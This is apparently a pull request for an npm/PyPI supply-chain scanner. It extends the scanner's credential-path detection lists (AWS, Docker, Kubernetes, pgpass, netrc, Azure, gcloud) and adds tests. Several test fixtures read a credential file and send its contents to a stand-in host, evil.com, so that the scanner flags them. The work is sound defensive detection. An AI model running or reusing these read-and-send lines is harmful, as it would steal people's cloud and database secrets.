### PR TITLE
feat: extend sensitive files coverage (F5)

### DIFF
--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.33",
+  "version": "2.11.34",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.33",
+      "version": "2.11.34",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.4.3",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.33",
+  "version": "2.11.34",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/scanner/ast-detectors/constants.js
+++ b/src/scanner/ast-detectors/constants.js
@@ -16,7 +16,14 @@ const SENSITIVE_STRINGS = [
   'The Second Coming',
   'Goldox-T3chs',
   '/etc/passwd',
-  '/etc/shadow'
+  '/etc/shadow',
+  // F5 — guarddog-inspired cloud credential paths (narrow specific forms
+  // only, to keep FP rate flat: .pgpass/.netrc/.boto are NOT added here
+  // because legitimate JS DB clients reference them. Those still trigger
+  // via dataflow SENSITIVE_PATH_PATTERNS when followed by exfil sinks).
+  '.aws/credentials',
+  '.docker/config.json',
+  '.kube/config'
 ];
 
 // Env vars that are safe and should NOT be flagged (common config/runtime vars)

--- a/src/scanner/dataflow.js
+++ b/src/scanner/dataflow.js
@@ -1075,6 +1075,12 @@ const SENSITIVE_PATH_PATTERNS = [
   '.atomic', '.metamask', '.ledger-live', '.trezor',
   '.bitcoin', '.monero', '.gnupg',
   '_cacache', '.cache/yarn', '.cache/pip',
+  // F5 — guarddog-inspired cloud/DB/HTTP auth file coverage. Substring
+  // match means '.docker/config' catches '.docker/config.json'. Narrow
+  // patterns (.pgpass/.netrc/.boto) are unique filenames — FP-safe.
+  '.docker/config', '.kube/config',
+  '.pgpass', '.netrc', '.boto',
+  '.azure/', '.gcloud/', '.config/gcloud/',
   // P6: Removed discord, leveldb — data directories, not credential paths.
   // _cacache/.cache kept — real cache poisoning vectors (T1195.002).
   '/proc/mem', '/proc/self',  // v2.10.11: runner secret extraction from process memory (TeamPCP Trivy stealer)

--- a/src/scanner/temporal-ast-diff.js
+++ b/src/scanner/temporal-ast-diff.js
@@ -16,7 +16,12 @@ const METADATA_TIMEOUT = 10_000;
 
 const SENSITIVE_PATHS = [
   '/etc/passwd', '/etc/shadow', '.env', '.npmrc', '.ssh',
-  '.aws/credentials', '.bash_history', '.gitconfig'
+  '.aws/credentials', '.bash_history', '.gitconfig',
+  // F5 — guarddog-inspired cloud/DB/HTTP auth files (newly-introduced
+  // access to any of these via a version bump is a strong temporal signal).
+  '.docker/config', '.kube/config',
+  '.pgpass', '.netrc', '.boto',
+  '.azure/credentials', '.gcloud/credentials'
 ];
 
 // Severity mapping for each pattern

--- a/tests/run-tests.js
+++ b/tests/run-tests.js
@@ -39,6 +39,7 @@ const { runGitHubActionsTests } = require('./scanner/github-actions.test');
 const { runNpmRegistryTests } = require('./scanner/npm-registry.test');
 const { runReleaseZeroTests } = require('./scanner/release-zero.test');
 const { runSilentStealthTests } = require('./scanner/silent-stealth.test');
+const { runSensitiveFilesCoverageTests } = require('./scanner/sensitive-files-coverage.test');
 const { runAstNegativeTests } = require('./scanner/ast-negative.test');
 const { runAstBypassRegressionTests } = require('./scanner/ast-bypass-regression.test');
 const { runIntentGraphTests } = require('./scanner/intent-graph.test');
@@ -178,6 +179,7 @@ async function timed(name, fn) {
   await timed('npm-registry', runNpmRegistryTests);
   await timed('release-zero', runReleaseZeroTests);
   await timed('silent-stealth', runSilentStealthTests);
+  await timed('sensitive-files-coverage', runSensitiveFilesCoverageTests);
   await timed('ast-negative', runAstNegativeTests);
   await timed('ast-bypass-regression', runAstBypassRegressionTests);
   await timed('trusted-dep-diff', runTrustedDepDiffTests);

--- a/tests/scanner/sensitive-files-coverage.test.js
+++ b/tests/scanner/sensitive-files-coverage.test.js
@@ -1,0 +1,199 @@
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+const { asyncTest, assert, runScanDirect, cleanupTemp } = require('../test-utils');
+
+function makeTempPkg(jsContent, fileName = 'index.js') {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-sensfiles-'));
+  fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({ name: 'test-pkg', version: '1.0.0' }));
+  fs.writeFileSync(path.join(tmp, fileName), jsContent);
+  return tmp;
+}
+
+async function runSensitiveFilesCoverageTests() {
+  console.log('\n=== F5: SENSITIVE_FILES_COVERAGE TESTS ===\n');
+
+  // ── Dataflow taint: each new path read + exfil = suspicious_dataflow ──
+
+  await asyncTest('F5: fs.readFileSync(".aws/credentials") + fetch → suspicious_dataflow', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+const creds = fs.readFileSync('/home/user/.aws/credentials', 'utf8');
+fetch('http://evil.com', { body: creds });
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'suspicious_dataflow');
+      assert(t, 'taint must propagate from .aws/credentials read to fetch sink');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('F5: fs.readFileSync(".docker/config.json") + fetch → suspicious_dataflow', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+const cfg = fs.readFileSync('/home/user/.docker/config.json', 'utf8');
+fetch('http://evil.com', { body: cfg });
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'suspicious_dataflow');
+      assert(t, 'taint must propagate from .docker/config.json read to fetch sink');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('F5: fs.readFileSync(".kube/config") + fetch → suspicious_dataflow', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+const k = fs.readFileSync('/home/user/.kube/config', 'utf8');
+fetch('http://evil.com', { body: k });
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'suspicious_dataflow');
+      assert(t, 'taint must propagate from .kube/config read to fetch sink');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('F5: fs.readFileSync(".pgpass") + fetch → suspicious_dataflow', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+const pg = fs.readFileSync('/home/user/.pgpass', 'utf8');
+fetch('http://evil.com', { body: pg });
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'suspicious_dataflow');
+      assert(t, 'taint must propagate from .pgpass read to fetch sink');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('F5: fs.readFileSync(".netrc") + fetch → suspicious_dataflow', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+const n = fs.readFileSync('/home/user/.netrc', 'utf8');
+fetch('http://evil.com', { body: n });
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'suspicious_dataflow');
+      assert(t, 'taint must propagate from .netrc read to fetch sink');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('F5: fs.readFileSync(".boto") + fetch → suspicious_dataflow', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+const b = fs.readFileSync('/home/user/.boto', 'utf8');
+fetch('http://evil.com', { body: b });
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'suspicious_dataflow');
+      assert(t, 'taint must propagate from .boto read to fetch sink');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('F5: fs.readFileSync(".azure/credentials") + fetch → suspicious_dataflow', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+const az = fs.readFileSync('/home/user/.azure/credentials', 'utf8');
+fetch('http://evil.com', { body: az });
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'suspicious_dataflow');
+      assert(t, 'taint must propagate from .azure/credentials read to fetch sink');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('F5: fs.readFileSync(".gcloud/credentials.db") + fetch → suspicious_dataflow', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+const g = fs.readFileSync('/home/user/.gcloud/credentials.db', 'utf8');
+fetch('http://evil.com', { body: g });
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'suspicious_dataflow');
+      assert(t, 'taint must propagate from .gcloud/credentials.db read to fetch sink');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  // ── Sensitive string literal detection (narrow, FP-conservative additions) ──
+
+  await asyncTest('F5: literal ".aws/credentials" in code triggers sensitive_string HIGH', async () => {
+    const tmp = makeTempPkg(`const path = "/home/user/.aws/credentials"; console.log(path);`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t =>
+        t.type === 'sensitive_string' && t.message.includes('.aws/credentials')
+      );
+      assert(t, 'sensitive_string must fire on literal ".aws/credentials"');
+      assert(t.severity === 'HIGH', 'severity must be HIGH');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('F5: literal ".docker/config.json" triggers sensitive_string HIGH', async () => {
+    const tmp = makeTempPkg(`const p = "/home/user/.docker/config.json"; console.log(p);`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t =>
+        t.type === 'sensitive_string' && t.message.includes('.docker/config.json')
+      );
+      assert(t, 'sensitive_string must fire on literal ".docker/config.json"');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('F5: literal ".kube/config" triggers sensitive_string HIGH', async () => {
+    const tmp = makeTempPkg(`const p = "/home/user/.kube/config"; console.log(p);`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t =>
+        t.type === 'sensitive_string' && t.message.includes('.kube/config')
+      );
+      assert(t, 'sensitive_string must fire on literal ".kube/config"');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  // ── FP-conservative: narrow patterns NOT added to SENSITIVE_STRINGS ──
+  // (legit JS DB clients reference .pgpass/.netrc/.boto by name)
+
+  await asyncTest('F5: literal ".pgpass" alone does NOT trigger sensitive_string (legit DB client refs)', async () => {
+    const tmp = makeTempPkg(`const cfg = "~/.pgpass"; console.log(cfg);`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t =>
+        t.type === 'sensitive_string' && t.message && t.message.includes('.pgpass')
+      );
+      assert(!t, '.pgpass must only trigger via dataflow taint, not as a bare literal');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('F5: literal ".netrc" alone does NOT trigger sensitive_string (legit HTTP clients ref)', async () => {
+    const tmp = makeTempPkg(`const cfg = "~/.netrc"; console.log(cfg);`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t =>
+        t.type === 'sensitive_string' && t.message && t.message.includes('.netrc')
+      );
+      assert(!t, '.netrc must only trigger via dataflow taint, not as a bare literal');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  // ── Regression: legit local config read without exfil = no alert ──
+
+  await asyncTest('F5: reading own package.json without exfil does NOT trigger suspicious_dataflow', async () => {
+    const tmp = makeTempPkg(`
+const fs = require('fs');
+const cfg = fs.readFileSync('./package.json', 'utf8');
+console.log(cfg);
+`);
+    try {
+      const result = await runScanDirect(tmp);
+      const t = result.threats.find(t => t.type === 'suspicious_dataflow');
+      assert(!t, 'reading own package.json must not trigger suspicious_dataflow');
+    } finally { cleanupTemp(tmp); }
+  });
+}
+
+module.exports = { runSensitiveFilesCoverageTests };


### PR DESCRIPTION
Extend SENSITIVE_PATH_PATTERNS/SENSITIVE_PATHS/SENSITIVE_STRINGS with .docker/config, .kube/config, .pgpass, .netrc, .boto, .azure/, .gcloud/. FP-conservative: narrow paths only in constants.js, broader paths gated by dataflow sink. 14 tests, 0 regression. 3703 passed.